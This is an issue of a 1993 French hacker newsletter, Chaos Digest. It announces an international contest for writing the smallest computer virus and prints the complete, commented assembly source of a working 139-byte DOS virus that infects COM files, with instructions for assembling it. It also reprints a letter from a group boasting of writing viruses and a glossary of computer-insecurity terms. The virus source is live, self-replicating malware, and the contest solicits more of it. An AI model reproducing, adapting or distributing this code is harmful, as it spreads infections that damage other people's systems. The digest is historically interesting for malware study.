Chaos Digest Mercredi 17 Fevrier 1993 Volume 1 : Numero 9
Editeur: Jean-Bernard Condat (
[email protected])
Archiviste: Yves-Marie Crabbe
Co-Redacteurs: Arnaud Bigare, Stephane Briere
TABLE DES MATIERES, #1.09 (17 Fev 1993)
File 1--Annonce du 1er "International Computer Virus Writing Contest"
File 2--Exemple d'ecriture d'un CPA sur 139 bytes
File 3--Un Createur de CPA peut-il etre Patriotique?
File 4--Glossaire de l'Insecurite Informatique
Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are
available at no cost from
[email protected]. The editors may be
contacted by voice (+33 1 47874083), fax (+33 1 47877070) or S-mail at:
Jean-Bernard Condat, Chaos Computer Club France [CCCF], 47 rue des Rosiers,
93400 St-Ouen, France
Issues of Chaos-D can also be found on some French BBS. Back issues of
ChaosD can be found on the Internet as part of the Computer underground
Digest archives. They're accessible using anonymous FTP from:
* ftp.eff.org (192.88.144.4) in /pub/cud
* red.css.itd.umich.edu (141.211.182.91) in /cud
* halcyon.com (192.135.191.2) in /pub/mirror/cud
* ftp.ee.mu.oz.au (128.250.77.2) in /pub/text/CuD
* nic.funet.fi (128.214.6.100) in /pub/doc/cud
CHAOS DIGEST is an open forum dedicated to sharing French information among
computerists and to the presentation and debate of diverse views. ChaosD
material may be reprinted for non-profit as long as the source is cited.
Some authors do copyright their material, and they should be contacted for
reprint permission. Readers are encouraged to submit reasoned articles in
French, English or German languages relating to computer culture and
telecommunications. Articles are preferred to short responses. Please
avoid quoting previous posts unless absolutely necessary.
DISCLAIMER: The views represented herein do not necessarily represent
the views of the moderators. Chaos Digest contributors
assume all responsibility for ensuring that articles
submitted do not violate copyright protections.
----------------------------------------------------------------------
Date: Fri Feb 12 18:30:04 GMT 1993
From:
[email protected] (Chaos Computer Club France )
Subject: File 1--Annonce du 1er "Intl. Computer Virus Writing Contest"
W E L C O M E
T O
T H E
F I R S T
* * * * * * * * * * * * * * * * * * * * * * * * * * * *
* *
* I N T E R N A T I O N A L *
* *
* C O M P U T E R *
* *
* V I R U S *
* *
* W R I T I N G *
* *
* C O N T E S T *
* *
* * * * * * * * * * * * * * * * * * * * * * * * * * * *
- 1 9 9 3 -
Final Date For Submissions: APRIL 1, 1993
This Contest is Sponsored by:
American Eagle Publications, Inc.
P. O. Box 41401
Tucson, AZ 85717 USA
Publisher of The Little Black Book of Computer Viruses
* * * * * * * * * * * * * * * * * * * * * * * * * * * *
! DISTRIBUTE THIS FILE ALL OVER THE KNOWN UNIVERSE !
* * * * * * * * * * * * * * * * * * * * * * * * * * * *
Ok, all you genius hackers out there! Here is a challenge
for you. Prove your stuff!
This is an INTERNATIONAL contest, and this file is
being circulated all over the world, so if you want to compete,
be forewarned, you've got worldwide competition. Only the best
have a chance in this game.
Still up to the challenge?
Ok, here it is:
I am writing Volume 2 of The Little Black Book of Compter
Viruses. This is a study of the scientific applications of
computer viruses, and their use in artificial life research,
and all of that neat stuff. One of the things I want to discuss
in the book is the limit on the size of a virus for a given
level of functionality. So I took the TIMID virus from Volume 1
and tore it down to the bare minimum. Not good enough. I wrote
a virus that worked a little differently. I tore that one down
to the bare minimum. Good enough? Well maybe. But maybe not.
I have some pretty compact code, but is it the absolute best?
I'm guessing somebody out there can top it.
Here are the rules:
(1) The object of this game is to write the smallest
virus you can with the required level of functionality.
(2) The virus must be capable of infecting all COM files
on the logged drive in the current directory of a PC,
no matter how many COM files are there. It may infect
them as quickly or as slowly as you like, so long as
it can be demonstrated that it will do so in an hour,
when running the programs in that directory one after
the other in sequential order.
(3) The virus must recognize itself and avoid re-infecting
files that have been infected. At most, only one in
fifty thousand files should get accidently re-infected,
assuming that the data in unknown COM files is random.
(4) The virus must terminate gracefully if it cannot find a
file to infect.
(5) The virus must not destroy any of the code in any file
which it infects. It must allow that code to execute
properly, or refuse to infect a file.
(6) The virus must be self-contained. It cannot hide
code in some common location on disk.
(7) The virus must function properly under MS-DOS 5.0 with
no TSR's resident, and nothing loaded high.
(8) The size will be determined by the larger of (A) the
number of bytes the virus code itself takes up in
an infected file, and (B) the largest number of bytes
the virus adds to a program when it infects it.
The best code I have for a virus that follows these rules right
now is 139 bytes long. Both source and executable are included
in the ZIP, named LITTLE.ASM and LITTLE.COM.
In the event of a tie for size, originality and ingenuity of
the code will break the tie. All judges decisions are final.
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
The winner will receive the following:
(1) A $100 CASH REWARD.
(2) Your code will be published in "The Little Black Book
of Computer Viruses", Volume 2.
(3) I will give you credit for the code and for winning
the International Virus Contest in the book, using
either your real name or an alias, your choice,
published in the book.
(4) Your name will be posted on the MISS bulletin board
as the contest winner.
(5) A free copy of "The Little Black Book of Computer
Viruses", Volume 2, and a one year subscription to
Computer Virus Developments Quarterly ($95 value).
Three honorable mention winners will receive a free copy of
The Little Black Book of Computer Viruses, Volume 2.
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
You may make an entry in two ways:
(1) Mail your entry on a PC format floppy disk to American Eagle
Publications, Inc., PO Box 41401, Tucson, AZ 85717 USA.
(2) Upload your entry to the M.I.S.S. bulletin board at
(805)251-0564 in the USA. Log on as GUEST, password VIRUS,
last 4 digits of phone number 0000, and upload to the CONTEST
UPLOADS directory.
A valid entry consists of the following items:
(A) Complete source code for a virus, which can be assembled
using either TASM, MASM, or A86. If you use another assembler
and don't know if one of the above will work, then send the
assembler along with the submission. If you do anything tricky
that we may not understand, you must explain it in comments in
the assembler source.
(B) A statement of who you are (aliases accepted) and how to
get in touch with you in case you win the contest. This
information will be kept strictly confidential, and encrypted
at all times.
By submitting an entry to the contest, you agree that the
copyright to your entry will be considered the property of
American Eagle Publications. The copyright to any losing
entry will be returned to the owner upon written request.
In the event that you win or receive honorable mention in the
contest, the copyright to the code will remain the property
of American Eagle Publications, Inc.
You may submit your entry encrypted with PGP 2.1 if you
desire. Use the following public key to encrypt:
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.1
mQBNAitZ9w4AAAECAOXJYOsJNavAAWFBRwf4/u0QWMJ9IHj8eajgOfDRdlCNwEBJ
wMs1vb5GcdJCaeoCgBR3Xxzh6oEo2nrwfru8mqMABRG0CE1BTHVkd2ln
=P6d4
-----END PGP PUBLIC KEY BLOCK-----
Go to it!
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
D O N ' T M I S S O U T ! ! !
Get Your Very Own
International Virus Writing Contest 1993
T-SHIRT
Great fun to wear to your local user's group meeting, or the
next computer security conference you attend. Sure to get
people's attention and initiate lots of interesting
conversation. Specify Small, Medium, or Large.
Only $9.95
from
American Eagle Publications, Inc.
P.O. Box 41401
Tucson, AZ 85717
(US Customers please add $3.00 for UPS delivery)
(Overseas customers please add $7.50 for airmail delivery)
(Overseas customers please add $3.00 for surface delivery)
(AZ residents add 5% sales tax)
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
American Eagle Publications, Inc., gives you first class
information to learn the ins and outs of viruses. You may
order any of the following items from American Eagle
Publications, PO Box 41401, Tucson, AZ 85717. (Shipping is $2.00
to the US, $7.50 for overseas airmail.) AZ residents add 5%
sales tax.
The Little Black Book of Computer Viruses, Volume 1,
by Mark Ludwig. This award-winning book will teach you the
basics of how viruses work in no-nonsense terms. 192 pgs.,
$14.95.
The Little Black Book of Computer Viruses Program Disk. All
of the programs in the book, both source code and executables,
$15.00.
Computer Virus Developments Quarterly, This takes up where the
Little Black Book leaves off, providing the reader with
quarterly updates on viruses and anti-virus technology.
For the advanced security specialist or programmer. One year
subscription with diskettes, $75.00 postpaid, overseas airmail
add $10.00.
Computer Virus Developments Quarterly, current single issue,
$25.00. (Please inquire as to price and availability of back
issues)
Technical Note #1: The Pakistani Brain Virus, a complete
disassembly and explanation. This is one of the first boot
sector viruses ever written, and the first stealth boot sector
virus. It hides on floppy disks and inserts the label (c) Brain
on the disk. 32 page booklet and diskette with assembler source
and compiled virus, $20.00.
Technical Note #2: The Stoned Virus, a complete disassembly and
explanation. The Stoned is the world's most successful boot
sector virus. It infects floppy disks and hard disks. Find out
what makes it tick. 24 page booklet and diskette with assembler
source, compiled virus, and detection tool, $20.00.
Technical Note #3: The Jerusalem Virus, a complete disassembly
and explanation. Jerusalem is an old but highly effective virus
which hides in memory, and infects every program you try to
execute. It starts deleting programs on Friday the 13th. Booklet
and diskette with assembler source and compiled virus, $20.00.
Technical Note #4: How to Write Protect an MFM Hard Disk. The
only hard-and-fast way to stop viruses from spreading is to
physically write-protect your disk. This tech note tells you how
to do it for the older MFM style drives. Some companies
sell such devices for hundreds of dollars, but this booklet
will tell you how to do the job for under $20. Complete with
theory, circuit diagrams, and a circuit board layout. No
diskette, $12.00.
How to Become a Virus Expert, a 60 minute audio tape by author
Mark Ludwig tells you how to get hold of the critical information
you need to protect your computers, and stop relying on some anti-
virus product developer to spoon-feed you. $10.00.
Wanted: Translators for these works in all languages and outlets
for these works in all countries. An opportunity for big $$ awaits
the enterprising person. Please contact us.
+++++++
No Virus Contest is complete without POLITICAL COMMENT:
Freedom is only free if it is VOLUNTARY. If you live in a
"democratic" nation that will not allow secession, then you DO
NOT live in a free country. The democracies of this world are
learning how to become tyrannies. Support a Secession Ammendment
for your constitution, before it is too late and you wish you
had. Secession is the only logical way to short-circuit the trend
toward big government and tyranny, short of all-out civil war.
+++++++
------------------------------
Date: Fri Feb 12 18:30:04 GMT 1993
From:
[email protected] (Chaos Computer Club France )
Subject: File 2--Exemple d'ecriture d'un CPA sur 139 bytes
;A small (139 byte) virus with minimal required functionality.
;This Virus for research purposes only. Please do not release!
;Please execute it only on a carefully controlled system, and only
;if you know what you're doing!
;An example for
;#######################################################
;# THE FIRST INTERNATIONAL VIRUS WRITING CONTEST #
;# 1 9 9 3 #
;# sponsored by #
;# American Eagle Publications, Inc. #
;#######################################################
;Assemble this file with TASM 2.0 or higher: "TASM LITTLE;"
;Link as "TLINK /T LITTLE;"
;Basic explanation of how this virus works:
;
;The virus takes control when the program first starts up. All of its code
;is originally located at the start of a COM file that has been infected.
;When the virus starts, it takes over a segment 64K above the one where the
;program was loaded by DOS. It copies itself up there, and then searches
;for an uninfected file. To determine if a file is infected, it checks the
;first two bytes to see if they are the same as its first two bytes. It
;reads the file into memory right above where it is sitting (at 100H in the
;upper segment). If not already infected, it just writes itself plus the
;file it infected back out to disk under the same file name. Then it moves
;the host in the lower segment back to offset 100H and executes it.
.model tiny ;Tiny model to create a COM file
.code
;DTA definitions
DTA EQU 0000H ;Disk transfer area
FSIZE EQU DTA+1AH ;file size location in file search
FNAME EQU DTA+1EH ;file name location in file search
ORG 100H
;*************************************************************************
;The virus starts here.
VIRSTART:
mov ax,ds
add ax,1000H
mov es,ax ;upper segment is this one + 1000H
mov si,100H ;put virus in the upper segment
mov di,si ;at offset 100H
mov cl,BYTE (OFFSET HOST AND 0FFH)
;can't code this with TASM
mov cl,8BH ;we can assume ch=0
rep movsb ;this will louse the infection up if run
;under debug!
mov ds,ax ;set ds to high segment
push ds
mov ax,OFFSET FIND_FILE
push ax
retf ;jump to high memory segment
;Now it's time to find a viable file to infect. We will look for any COM
;file and see if the virus is there already.
FIND_FILE:
xor dx,dx ;move dta to high segment
mov ah,1AH ;so we don't trash the command line
int 21H ;which the host is expecting
mov dx,OFFSET COMFILE
mov ch,3FH ;search for any file, no matter what
;attribute (note: cx=0 before this instr)
mov ah,4EH ;DOS search first function
int 21H
CHECK_FILE:
jc ALLDONE ;no COM files to infect
mov dx,FNAME ;first open the file
mov ax,3D02H ;r/w access open file, since we'll want to write to it
int 21H
jc NEXT_FILE ;error opening file - quit and say this
;file can't be used
mov bx,ax ;put file handle in bx, and leave it there
;for the duration
mov di,FSIZE
mov cx,[di] ;get file size for reading into buffer
mov dx,si ;and read file in at HOST in new segment
;(note si=OFFSET HOST)
mov ah,3FH ;DOS read function
int 21H
mov ax,[si] ;si=OFFSET HOST here
jc NEXT_FILE ;skip file if error reading it
cmp ax,WORD PTR [VIRSTART]
;see if infected already
jnz INFECT_FILE ;nope, go do it
mov ah,3EH ;else close the file
int 21H ;and fall through to search for another file
NEXT_FILE:
mov ah,4FH ;look for another file
int 21H
jmp SHORT CHECK_FILE ;and go check it out
COMFILE DB '*.COM',0
;When we get here, we've opened a file successfully, and read it into
;memory. In the high segment, the file is set up exactly as it will look
;when infected. Thus, to infect, we just rewrite the file from the start,
;using the ;image in the high segment.
INFECT_FILE:
xor cx,cx
mov dx,cx ;reset file pointer to start of file
mov ax,4200H
int 21H
mov ah,40H
mov dx,100H
mov cx,WORD PTR [di] ;adjust size of file for infection
add cx,OFFSET HOST - 100H
int 21H ;write infected file
mov ah,3EH ;close the file
int 21H
;The infection process is now complete. This routine moves the host
;program down so that its code starts at offset 100H, and then transfers
;control to it.
ALLDONE:
mov ax,ss ;set ds, es to low segment again
mov ds,ax
mov es,ax
push ax ;prep for retf to host
shr dx,1 ;restore dta to original value
mov ah,1AH ;for compatibility
int 21H
mov di,100H ;prep to move host back to original location
push di
mov cx,sp ;move code, but don't trash the stack
sub cx,si
mov cx,0FE6FH ;hand code the above to save a byte
rep movsb ;move code
retf ;and return to host
;***************************************************************************
;The host program starts here. This one is a dummy that just returns control
;to DOS.
HOST:
mov ax,4C00H ;Terminate, error code = 0
int 21H
HOST_END:
END VIRSTART
------------------------------
Date: 29 Jan 93 15:59:00 +0000
From:
[email protected] (Sam Wilson )
Subject: File 3--Un Createur de CPA peut-il etre Patriotique?
Repost: Virus-L Digest #6.16 (4 Fev 93)
The following letter and editorial response appears in the February
1993 issue of the UK magazine 'Personal Computer World' under the
heading "Spreading viruses":
We are a bunch of programmers who, depressed with the lack of
viruses that have originated in England, have sought to change
matters. We presently write viruses for the PC, Archimedes and Atari
ST. We have increased the few viruses written in England by about
25, though this number is increasing all the time as our programmers
churn out more quality computer viruses.
Although there are many viruses about we hope to dominate the UK
'market'. Won't it be nice, though, for England to have at least one
export?
Finally, we as an organisation like to stress that, contrary to
public opinion, we are *not* boring people who wear anoraks, nor are
we depraved people who were beaten as children and so grew up with a
hatred of humanity.
We are highly intelligent and good at programming and are just
ordinary people. But we are gonna get you soon!
ARCV
(Association of Really Cruel Viruses)
[And the editor replies:]
You say you're not depraved people? Perhaps you weren't beaten as
children, but as far as we're concerned you should be beaten as adults.
I wish it were the April issue...
Sam Wilson
Network Services Division
Computing Services, The University of Edinburgh
Edinburgh, Scotland, UK
------------------------------
Date: Fri, 12 Feb 93 23:26:52 +0000
From:
[email protected] (Johnathan Vail )
Subject: File 4--Glossaire de l'Insecurite Informatique
Repost from: Virus-L Digest #6.26 (16 Feb 1993)
________________________________________________________________________
Glossary of Computer Insecurity
Compiled by Johnathan Vail (
[email protected])
Created by several people on comp.virus newsgroup
________________________________________________________________________
async interrupt (attack) - to exploit system vulnerabilities arising
from deficiencies in the interrupt management facilities of an
operating system.
back door - This is an undocumented feature added to a product which
can allow those who know about it to gain access to features that are
otherwise protected. The original Tempest video game was supposed to
have a key sequence that would allow the author of the firmware to get
free games in an arcade. Some military systems are rumored to have
back doors in their software that prevents their being used against
the countries that built them.
blivet (attack) - A denial-of-service attack performed by hogging
limited resources that have no access controls (for example, shared
spool space on a multi-user system). [Classically defined as "ten pounds
of horsesh*t in a five pound bag"]
browsing - Gaining unauthorized read-only access to files.
C2 Catch-22 - Refers to the paradox that all federal computers are
required to be certified to the C2 level of Trust (or better) by 1992
(especially if they are to be permitted access to a network), yet
because no C2 certification has ever been performed with the network
software active, NSA will revoke the certification of any system as
soon as it is connected to a network. [Also "C2-by-'92 Catch-22".]
cascading - To gain additional privileges on a host (or within a
process) by using those privileges legitimately (if perhaps unwisely)
granted to casual users.
crayola books - A disparaging reference to the "rainbow books",
commonly used when referring to the upcoming rewrite of NSA's
technical computer security guidelines.
crypt (attack) - Stealing the system password file and looking for
known encrypted passwords.
data diddling - To alter another's data (especially, to do so subtly
so it will not be detected); a major breach of the hacker ethic.
denial-of-service attack - Any method which an intruder might use to injure
authorized users of a system by making its facilities unavailable. Often
easier to accomplish than hijacking a privileged account.
dictionary (attack) - Trying a dictionary of commonly used or vendor
installed passwords.
Easter Egg - This is a usually benign feature added to a product by
the programmer without official knowledge or consent. One example of
the is the 'xyzzy' command in Data General's AOS operating system.
Another is the "RESIST THE DRAFT" message in an unused sector of Apple
Logo.
ethical hacker - Someone who espouses the view that he/she may
"ethically" penetrate any computer or network so long as no data is
altered. [Colloquially among computer security professionals: a dead
hacker (or one who has ceased hacking).]
leapfrog (attack) - Using userid and password information obtained
illicitly from one host (e.g., downloading a file of account IDs and
passwords, tapping TELNET, etc.) to compromise another host. Also, to
TELNET through one or more hosts in order to confuse a trace (standard
cracker procedure).
masquerading - To assume the identity of another user to gain
unauthorized access to a host or network.
mockingbird - Software that intercepts communications (especially
logon processes) between users and hosts and provides system-like
responses to the users while obtaining information (especially account
IDs and passwords).
pest - A set of instructions that self-replicates uncontrollably,
eventually rendering a network or system unusable via a
blivet attack. [sometimes called "wabbits"]
phage - An autonomous program that inserts malicious code into
other autonomous programs (e.g., a computer worm or probe
that carries a virus or trojan horse program).
polymorphic virus - 1. A virus using variable encryption with a
variable decryption routine to avoid detection by its
"signature". V2P6, Whale, Maltese, Amoeba, Russian Mutant
and PC-Flu 2 are examples. 2. Any virus that changes it's
behaviour such as infect different types of host or change
their mode of operation. A virus that infects both .COM and
.EXE programs as well as boot sectors can be considered
polymorphic.
probe - A non-self-replicating, autonomous program (or set of
programs) that has the ability to execute indirectly
through a network or multi-partition computer system
(e.g., various hacker utilities).
rainbow books - NSA's technical computer security guidelines.
So named because each of the books is published with a
different color cover. [See "crayola books".]
scavenging - To exploit unerased residual data. The controversy with
the Prodigy [users finding pieces of the their data in the
STAGE.DAT file] service is an alleged example of this.
spoofing - An attack which relies on the inability of users or computer
systems to verify the identity or location of a communication partner.
A `mockingbird' spoofs the computer's login sequence to fool a user;
some cracking software repeatedly spoofs human login actions to fool
the computer.
stealth virus - A type of virus that attempts to hide its existence.
A common way of doing this on IBM PCs is for the virus to hook
itself into the BIOS or DOS and trap sector reads and writes that
might reveal its existence.
trapdoor - A method of bypassing a sequence of instructions, often
some part of the security code (e.g. the computer logon).
time bomb - This is code or a program that checks the systems clock in
order to trigger its active symptoms. The popular legend of the time
bomb is the programmer that installs one in his employer's computers
to go off in case he is laid off or fired.
trojan (horse) - This is some (usually nasty) code that is added to,
or in place of, a harmless program. This could include many viruses
but is usually reserved to describe code that does not replicate
itself.
unknown system-state (attack) - To exploit the conditions that occur
after a partial or total system crash (e.g., some files remain open
without an end-of-file condition allowing an intruder to obtain
unauthorized access to other files by reading beyond the real EOF when
service is resumed).
virus - a piece of code that is executed as part of another program
and can replicate itself in other programs. The analogy to real
viruses is pertinent ("a core of nucleic acid, having the ability to
reproduce only inside a living cell"). Most viruses on PCs really are
viruses.
worm - An autonomous program (or set of programs) that can replicate
itself, usually over a network. A worm is a complete program by
itself unlike a virus which is either part of another program or
requires another program's thread of execution to operate. Robert
Morris's program, the Internet Worm, is an example of a worm although
it has been mistakenly identified in the popular media as a virus.
________________________________________________________________________
_____
| | Johnathan Vail
[email protected] (508) 663-7435
|Tegra|
[email protected] [email protected](WorldNet)
----- MEMBER: League for Programming Freedom (
[email protected])
------------------------------
End of Chaos Digest #1.09
************************************
